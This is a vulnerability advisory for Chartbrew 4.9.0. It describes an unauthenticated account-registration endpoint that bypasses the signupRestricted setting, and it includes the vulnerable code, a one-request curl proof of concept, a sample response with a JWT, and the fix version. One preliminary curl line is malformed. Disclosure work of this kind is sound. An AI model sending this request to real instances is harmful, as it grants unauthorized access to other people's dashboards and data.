# Unauthorized Account Registration Vulnerability Summary for Chartbrew ## Vulnerability Overview The `POST /user/invited` endpoint in Chartbrew does not validate invitation tokens, authentication headers, or sessions. Any unauthorized attacker can directly call this endpoint to create a fully active account and receive a valid JWT, even if the instance has existing users and the `signupRestricted` restriction enabled. ## Impact Scope - **Affected Versions**: 4.9.0 (Latest version) - **Fixed Version**: v5.0.0 - **Severity**: CVSS v3 Base Score 6.5/10 - **Attack Vector**: Network - **Attack Complexity**: Low - **Privileges Required**: None - **User Interaction**: None - **Scope**: Unchanged - **Confidentiality**: Low - **Integrity**: Low - **Availability**: None ## Remediation Upgrade to version v5.0.0. ## POC Code ### Vulnerable Endpoint Code (server/api/UserRoute.js:112) ```javascript // No middleware, no token validation app.post("/user/invited", (req, res) => { if (!req.body.email || !req.body.password) return res.status(400).send("no email or password"); const userObj = { email: req.body.email, password: req.body.password, name: req.body.name, active: true, // -- immediately active, no verification }; return userController.createUser(userObj) .then((newUser) => { return tokenHandler(newUser, res); // -- JWT returned immediately }); }); ``` ### Protected Endpoint Code (Comparison) ```javascript app.post("/user", async (req, res) => { if (app.settings.signupRestricted == "1") { // -- enforced here const areThereAnyUsers = await userController.areThereAnyUsers(); if (areThereAnyUsers) return res.status(401).send("Signups are restricted"); } // active: false -- requires verification }); ``` ### Exploitation Code ```bash # Instance already has users -- signupRestricted should apply curl http://localhost:4019/api/users \ -H "areThereAnyUsers": true # Attack (1 request without credentials): curl -i -X POST http://TARGET/user/invited \ -H "Content-Type: application/json" \ -d '{ "name": "Attacker", "email": "attacker@evil.com", "password": "Test1234!" }' ``` ### Response (HTTP 200) ```json { "id": 4, "email": "attacker@evil.com", "name": "Attacker", "active": true, "token": "eyJhbGciOiJ9IzI1NiIsInR5cCI6IkpXVCJ9..." } ``` ## Impact An unauthorized remote attacker can: 1. Create accounts on any Chartbrew instance, regardless of the `signupRestricted` configuration. 2. Receive a valid 30-day JWT immediately after registration. 3. Access all authenticated API endpoints as a legitimate user, including creating teams, projects, and data connections. 4. Enumerate and interact with shared/public dashboards that are visible to authenticated users but not to the public. This vulnerability is particularly severe on instances where `signupRestricted = "1"` is intentionally set to prevent unauthorized access, as the protection is completely bypassed.